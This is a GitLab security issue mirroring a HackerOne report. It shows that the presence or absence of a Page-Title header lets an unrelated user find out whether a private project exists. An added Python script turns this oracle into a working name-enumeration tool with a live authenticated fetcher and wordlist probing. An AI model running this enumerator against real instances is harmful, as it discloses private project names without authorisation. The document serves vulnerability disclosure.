ESCALATED: Disclosure of private project names based on Page-Title: GitLab header
HackerOne report #651893 by janmasarik on 2019-07-20, assigned to akelly:
Summary
You can enumerate anyone's private project names based on the presence of the Page-Title: GitLab header in the GET /username/project endpoint.
If a private group with the specified name exists, most of the API endpoints under the /username/project path will respond without Page-Title: GitLab.
If a given project does not exist, the response will include the Page-Title: GitLab header. Based on my previous report #338537 (closed), I believe that this is not intended behavior and if you specify the project as private, its name shouldn't leak to unauthenticated users.
Steps to reproduce
- Create a private project on GitLab, e.g. [REDACTED]
- Authenticate with any other user in GitLab, let's say user2.
- With the session of user2, which is not authorized to view [REDACTED], send an authenticated GET request to /jan.masarik1/secret.
- Notice the missing Page-Title: GitLab => project exists
Verification
- With the session of user2, send a GET request to /jan.masarik1/non-existent.
- See the Page-Title: GitLab header => project does not exist
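The reproduction and verification steps above describe a binary oracle: the response to GET /username/project carries a Page-Title: GitLab header when no such project exists and omits it when a private project does. The following script, an added example that is not part of the report or of GitLab, turns that oracle into a name-enumeration loop. It keeps the HTTP transport behind a fetcher callable so the classification logic can be exercised offline against constructed responses; the target base URL, the `_gitlab_session` cookie name, the candidate names and the canned responses are all assumptions, and status codes are deliberately ignored because the report bases the distinction on the header alone.

```python
"""Enumerate private GitLab project names via the Page-Title header oracle.

Added example (not the reporter's or GitLab's code). Everything below that
names a host, a cookie or a project is a constructed assumption.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

Response = Tuple[int, Dict[str, str]]  # (status code, response headers)
Fetcher = Callable[[str], Response]    # request path -> Response

ORACLE_HEADER = "page-title"


def has_page_title(headers: Dict[str, str]) -> bool:
    """HTTP header names are case-insensitive, so normalise before matching."""
    return any(name.lower() == ORACLE_HEADER for name in headers)


def classify(headers: Dict[str, str]) -> str:
    """Apply the report's rule: header present -> no such project,
    header missing -> a (private) project with that name exists.
    The status code is intentionally not consulted."""
    return "absent" if has_page_title(headers) else "exists"


def enumerate_projects(fetch: Fetcher, namespace: str,
                       candidates: Iterable[str]) -> List[str]:
    """Probe /<namespace>/<candidate> for each candidate and return the
    names the oracle reports as existing."""
    found = []
    for name in candidates:
        _status, headers = fetch(f"/{namespace}/{name}")
        if classify(headers) == "exists":
            found.append(name)
    return found


def make_http_fetcher(base_url: str, session_cookie: str) -> Fetcher:
    """Real transport: authenticated GET as an unrelated user (user2 in
    the report). Assumes GitLab's session cookie is named _gitlab_session."""
    def fetch(path: str) -> Response:
        req = urllib.request.Request(
            base_url.rstrip("/") + path,
            headers={"Cookie": f"_gitlab_session={session_cookie}"},
        )
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, dict(resp.headers.items())
        except urllib.error.HTTPError as err:
            # Error responses still carry headers; the oracle lives there.
            return err.code, dict(err.headers.items())
    return fetch


# Constructed stand-in responses so the example runs offline. They mirror
# the two observations in the report; the status codes are made up and
# play no role in the classification.
CANNED: Dict[str, Response] = {
    "/jan.masarik1/secret": (404, {"Content-Type": "text/html"}),
    "/jan.masarik1/non-existent": (404, {"Content-Type": "text/html",
                                         "Page-Title": "GitLab"}),
}


def canned_fetch(path: str) -> Response:
    """Offline fetcher: unknown paths behave like non-existent projects."""
    return CANNED.get(path, (404, {"Page-Title": "GitLab"}))


if __name__ == "__main__":
    # Offline demonstration against the canned responses above.
    hits = enumerate_projects(canned_fetch, "jan.masarik1",
                              ["secret", "non-existent", "wordlist-entry"])
    print("private projects inferred:", hits)
    # Against a live instance you would instead build the fetcher with
    # make_http_fetcher("https://gitlab.example", "<user2 session>")
    # and feed it a wordlist; only do so within the program's rules.
```

The `classify` function is the whole finding in one line; everything else is plumbing so that the same check can be run against a real instance by swapping `canned_fetch` for `make_http_fetcher(...)`.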
What is the current bug behavior?
Private project name is disclosed.
What is the expected correct behavior?
Private project name should remain secret. :-)
Relevant logs and/or screenshots
[REDACTED]
Output of checks
This bug happens on GitLab.com
Impact
Similar as in #338537 (closed) or #642420 (Low)
Attachments
[REDACTED]